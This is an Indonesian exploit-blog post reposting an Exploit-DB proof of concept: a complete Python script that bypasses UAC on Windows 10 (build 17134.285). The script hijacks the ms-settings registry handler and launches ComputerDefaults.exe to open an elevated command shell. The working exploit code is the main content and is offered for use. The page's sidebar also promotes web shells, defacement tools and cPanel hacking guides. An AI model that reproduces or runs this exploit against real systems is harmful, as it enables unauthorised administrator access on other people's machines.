• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Microsoft Windows 10 – Local Privilege Escalation (UAC Bypass)

October 23, 2018 by Jack Wilder 2 Comments

Microsoft Windows 10 – Local Privilege Escalation (UAC Bypass) – Exploit ini digunakan untuk mendapatkan akses Admin dan mem-bypass UAC pada Windows 10. Exploit ini sudah di test oleh authornya pada Windows 10 pro Version 10.0.17134.285.

Exploit Title: Windows 10 UAC Bypass by computerDefault
Date: 2018-10-18
Exploit Author: Fabien DROMAS – Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>
Twitter: st0rnpentest

Vendor Homepage: www.microsoft.com
Version: Version 10.0.17134.285
Tested on: Windows 10 pro Version 10.0.17134.285

exploit.py

#!/usr/bin/env python
#
# Exploit Title: Windows 10 UAC Bypass by computerDefault
# Date: 2018-10-18
# Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: www.microsoft.com
# Version: Version 10.0.17134.285
# Tested on: Windows 10 pro Version 10.0.17134.285
#

import os
import sys
import ctypes
import _winreg


def create_reg_key(key, value):
try:
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise

def exec_bypass_uac(cmd):
try:
create_reg_key('DelegateExecute', '')
create_reg_key(None, cmd)
except WindowsError:
raise

def bypass_uac():
try:
current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
cmd = "C:\windows\System32\cmd.exe"
exec_bypass_uac(cmd)
os.system(r'C:\windows\system32\ComputerDefaults.exe')
return 1
except WindowsError:
sys.exit(1)

if __name__ == '__main__':

if bypass_uac():
print "Enjoy your Admin Shell :)"
  • https://www.exploit-db.com/exploits/45660/
Shares

Filed Under: Privilege Escalation

Reader Interactions

Comments

  1. paks says

    October 26, 2018 at 5:29 pm

    deface POC baru dong bang

    Reply
  2. admin says

    November 19, 2018 at 2:16 am

    Root

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Download 1n73ct10n / 1n73ction Privat Web Shell by X’1N73CT

Cara Mendapatkan RDP Gratis Dengan Shell Windows

Shopify Custom Domain or Subdomain Takeover

Cara Mudah Hack cPanel dengan Fitur Reset Password

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

Tumblr Custom Domain or Subdomain Takeover

Open Redirect Bypass Cheat Sheet

Reverse Shell From Local File Inclusion Exploit

MIME Type Sniffing pada Form Upload Gambar

Tool Deface Opencart Bruteforce and Upload Image

LinuxSec / 85 queries in 0.97 seconds